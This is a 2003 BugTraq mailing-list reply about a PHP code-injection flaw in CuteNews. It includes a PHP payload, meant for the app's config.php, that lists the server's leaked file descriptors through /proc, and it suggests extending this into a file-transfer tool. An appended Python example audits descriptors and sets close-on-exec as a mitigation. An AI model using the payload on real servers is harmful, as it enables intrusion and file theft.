BugTraq
Re: PHP code injection in CuteNews
Feb 28 2003 10:18PM
Steve Grubb (linux_4ever yahoo com)
In-Reply-To: <E18ndJT-000JS2-00 (at) f19.mail (dot) ru [email concealed]>
Hello,
If the CuteNews website is running Apache 2.x, which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
then you can do this:
config.php =
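<html><head><title>File List</title></head>
<body> <?php
// "$$" is not a PHP variable; the shell that exec() starts expands it to its
// own PID, so this lists the descriptors that shell inherited.
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
    // ls prints each descriptor as "N -> target"; keep the part after "> ".
    $match = preg_split("/> /", $item);
    if (isset($match[1])) {
        // Only show targets that are filesystem paths.
        if (preg_match("/\//", $match[1])) {
            echo $match[1]; echo "<br>";
        }
    }
}
?> </body></html>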
It doesn't take a lot more to make this a fully
clickable file transfer utility that sandboxes or jails
cannot protect.
-Steve Grubb
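
The condition this message relies on is a server leaving descriptors inheritable, so that whatever it execs (such as the shell behind PHP's exec()) receives them. The following is an added example, not part of the original post: it audits a process for descriptors lacking close-on-exec, sets the flag, and confirms from a child process that they are gone. The socket pair and /dev/null handle are constructed stand-ins, and all function names are hypothetical.

```python
import os
import socket
import subprocess
import sys

def open_fds():
    """Descriptors open in this process (Linux /proc, else a range scan)."""
    try:
        return sorted(int(n) for n in os.listdir("/proc/self/fd"))
    except OSError:
        return list(range(256))

def inheritable_fds(skip=(0, 1, 2)):
    """Open descriptors lacking close-on-exec, i.e. ones an exec'd child keeps."""
    found = []
    for fd in open_fds():
        try:
            if fd not in skip and os.get_inheritable(fd):
                found.append(fd)
        except OSError:
            pass  # closed between listing and check
    return found

def harden():
    """Set close-on-exec on every inheritable descriptor; return those changed."""
    changed = inheritable_fds()
    for fd in changed:
        os.set_inheritable(fd, False)
    return changed

def child_sees(fd):
    """True if a child started without descriptor cleanup still has `fd` open."""
    probe = "import os, sys; os.fstat(int(sys.argv[1]))"
    result = subprocess.run([sys.executable, "-c", probe, str(fd)],
                            close_fds=False, stderr=subprocess.DEVNULL)
    return result.returncode == 0

def demo():
    conn, peer = socket.socketpair()  # constructed stand-in for a client socket
    log = open(os.devnull, "w")       # constructed stand-in for a log file
    fds = [conn.fileno(), log.fileno()]
    for fd in fds:
        os.set_inheritable(fd, True)  # simulate descriptors opened without close-on-exec
    before = [child_sees(fd) for fd in fds]
    changed = harden()
    after = [child_sees(fd) for fd in fds]
    for f in (conn, peer, log):
        f.close()
    return fds, before, changed, after
```

Calling demo() returns the two descriptor numbers, whether a child could see each before hardening, the descriptors harden() changed, and whether a child could see each afterwards.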